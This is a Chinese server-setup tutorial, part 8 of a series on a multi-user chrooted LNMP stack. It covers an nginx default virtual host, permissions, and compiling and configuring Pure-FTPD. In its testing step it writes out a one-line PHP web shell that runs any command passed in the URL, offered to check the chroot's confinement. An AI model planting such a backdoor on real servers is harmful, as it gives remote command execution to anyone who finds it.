lnmp多用户安全运行环境(chroot)(8)

4、创建默认虚拟主机
cat >/usr/local/nginx/conf/vhosts/default.conf <<EOF
server {
listen 80 default;
listen 8080 default;
server_name _;
access_log /var/log/nginx/default-access.log combined;
error_log /var/log/nginx/default-error.log;
root /var/www/html;
index index.html index.htm index.php;
charset utf-8;

include fastcgi_purge_cache.inc;

if (-d \$request_filename){
rewrite ^/(.*)([^/])\$ \$scheme://\$host/\$1\$2/ permanent;
}

#include /var/www/html/nginx.conf;

location / {
rewrite ^/\$ http://www.google.com/ncr permanent;
}

error_page 404 http://www.google.com/ncr;

location ~* \.php {
fastcgi_pass 127.0.0.1:9001;
fastcgi_index index.php;
include fastcgi.inc;
include fastcgi_cache.inc;
#fastcgi_param HTTPS on;
}

location ~* \.(ftpquota|htaccess|htpasswd|asp|aspx|jsp|asa|mdb)?\$ {
deny all;
}
}
EOF

5、杂项，修改配置路径及日志路径的目录权限
find /usr/local/nginx/conf/ -type f -exec chmod 0640 {} \;
find /usr/local/nginx/conf/ -type d -exec chmod 0750 {} \;
chmod 750 /var/log/nginx

6、测试
启动php-fpm和nginx，然后建立第一个网站路径
service php-fpm start
service nginx start

写个输出phpinfo的php
cat > /var/www/html/phpinfo.php <<EOF
< ?php
phpinfo();
?>
EOF

或者可以传个小马上来测试，比如下面这个一句话小马
cat > /var/www/html/t.php <<EOF
< ?php
\$run = \$_GET['r'];
echo \`\$run\`;
?>
EOF

打开浏览器，直接用小马探测下
比如执行pwd命令 http://ip/t.php?r=pwd
再比如执行ls命令 http://ip/t.php?r=ls

六、编译ftp软件Pure-FTPD，鉴权直接使用系统passwd，如果要配合其他程序，建议修改为mysql鉴权
1、开始编译
cd /usr/local/src/
wget http://download.pureftpd.org/pub/pure-ftpd/releases/pure-ftpd-1.0.36.tar.gz
tar -zxvf pure-ftpd-1.0.36.tar.gz
cd pure-ftpd-1.0.36/
./configure --prefix=/usr/local/pureftpd --with-puredb --with-shadow --with-pam --with-paranoidmsg --with-welcomemsg --with-uploadscript --with-cookie --with-virtualchroot --with-virtualhosts --with-virtualchroot --with-diraliases --with-quotas --with-sysquotas --with-ratios --with-ftpwho --with-throttling --with-tls --with-rfc2640 --with-bonjour
make && make install
/usr/bin/install -m 755 configuration-file/pure-config.pl /usr/local/pureftpd/sbin/pure-config.pl
mkdir -p {/usr/local/pureftpd/etc/,/var/ftp}
/usr/bin/install -m 644 configuration-file/pure-ftpd.conf /usr/local/pureftpd/etc/pure-ftpd.conf

2、创建开机启动init脚本
/usr/bin/install -m 755 contrib/redhat.init /etc/rc.d/init.d/pureftpd
chkconfig --add pureftpd
chkconfig --level 2345 pureftpd on

3、修改Pure-FTPD配置
sed -i '143 s/# //' /usr/local/pureftpd/etc/pure-ftpd.conf
sed -i '180 s/# //' /usr/local/pureftpd/etc/pure-ftpd.conf
sed -i '246 s/no/yes/' /usr/local/pureftpd/etc/pure-ftpd.conf
sed -i '336 s/#//' /usr/local/pureftpd/etc/pure-ftpd.conf
sed -i '351 s/#//' /usr/local/pureftpd/etc/pure-ftpd.conf

为FTP用户设置umask值
sed -i '234 s#133:022#173:072#' /usr/local/pureftpd/etc/pure-ftpd.conf

4、创建软链接及密码文件
ln -s /usr/local/pureftpd/sbin/pure-config.pl /usr/local/sbin/pure-config.pl
ln -s /usr/local/pureftpd/bin/pure-pw /usr/local/bin/pure-pw
ln -s /usr/local/pureftpd/sbin/pure-ftpwho /usr/local/sbin/pure-ftpwho
ln -s /usr/local/pureftpd/etc/pure-ftpd.conf /etc/pure-ftpd.conf

5、杂项，将日志从系统syslog中剥离开来
sed -i '42 s/cron.none/cron.none;ftp.none/' /etc/rsyslog.conf
echo "ftp.* -/var/log/pureftpd.log" >> /etc/rsyslog.conf
service rsyslog restart

七、最后启用所有服务
service mysqld start
service php-fpm start
service nginx start
service pureftpd start